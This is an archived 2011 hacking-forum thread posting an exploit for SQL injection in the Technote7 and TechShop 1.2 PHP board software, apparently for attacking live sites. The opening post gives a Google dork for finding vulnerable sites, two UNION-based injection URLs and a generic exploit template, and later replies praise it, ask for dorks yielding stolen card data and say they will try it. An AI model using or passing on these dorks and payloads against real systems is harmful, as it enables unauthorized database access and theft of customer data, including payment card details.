PDA

View Full Version : Technote7, TechShop 1.2( sql injection vulnerability



cunlestic
01-04-2011, 09:12 AM
# Exploit Title: Technote7(Commercial Version, Free Version) <== SQL Injection Vulnerabilities
# Google Dork: inurl:/technote/board.php?category=
# Date: 2011/01/02
# Author: MaJ3stY(http://maj3sty.tistory.com)
# Language : PHP
# Software Link: http://www.technote.co.kr/php/technote1/board.php?board=consult&command=skin_insert&exe=insert_down_shop
# Version: Technote7, TechShop 1.2(The latest version of the current from)
# Tested on: All Windows, All Linux

PoC(Technote7) :

http://localhost/board.php?board=skinmarket&category=11 and 1=2 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,@@version,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51 ,52,53,54,55,56,57,58,59,60,61--

PoC(Technote7 - Techshop 1.2) :

http://localhost/board.php?board=agcmain&category=10 and 1=2 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,@@version,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51 ,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,6 8,69,70,71--

Exploit :

http://site/board.php?board=boarname&category=[SQL Line]

--devil--
01-06-2011, 06:13 PM
how to use this:(

pekelhc
01-11-2011, 01:24 AM
nice share !

dargilkey
01-15-2011, 06:48 PM
great job thanks

brettfavre
01-17-2011, 10:51 PM
good job man

ItzYoshii
01-21-2011, 04:20 PM
nice one :)

ItzYoshii
01-21-2011, 04:22 PM
nice share :) thanks

Charlie
01-31-2011, 10:08 PM
Niceee vuln. mate

bruseadams
01-31-2011, 11:43 PM
nice one. but can you post more specific dorks that can lead to planty cvv with .asp and php

dave52421
02-01-2011, 05:57 AM
pls can you teach more abt this stuff my email is [email protected]

yukisomakio
02-01-2011, 07:40 AM
very well...

pascalll2222
02-01-2011, 08:25 AM
thank you man

esta
02-06-2011, 01:12 PM
great info will give it a try , thanks

egynono
02-06-2011, 05:33 PM
thxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxx

wayne
02-10-2011, 05:24 PM
Nicee shareeeeeeeeeeeeeeeeeeeeeeeeeeeee

ocp
02-11-2011, 05:14 PM
very good bro thanks so much

surrie211
02-12-2011, 07:23 AM
thnxxxxxxxxxxxxxxx

meknes
02-13-2011, 03:04 PM
good post.thanks

harris01
02-17-2011, 12:14 AM
great work thanz for sharing

Gembel X-Secutive
02-26-2011, 03:04 PM
Very Beautiful
thanks my Brother For Your Share http://www.freeworldnow.com/boy%20kisses%20Koran.jpg

cachua_0
03-04-2011, 05:20 PM
good thank for share

12ksawaya
03-05-2011, 04:39 AM
nice post bro, keep up the good work

gimi
03-17-2011, 02:14 PM
great job thanks :)

bobftw
03-18-2011, 02:28 AM
nice share thanks a lot!

ndd
03-18-2011, 05:26 AM
nice post, thanks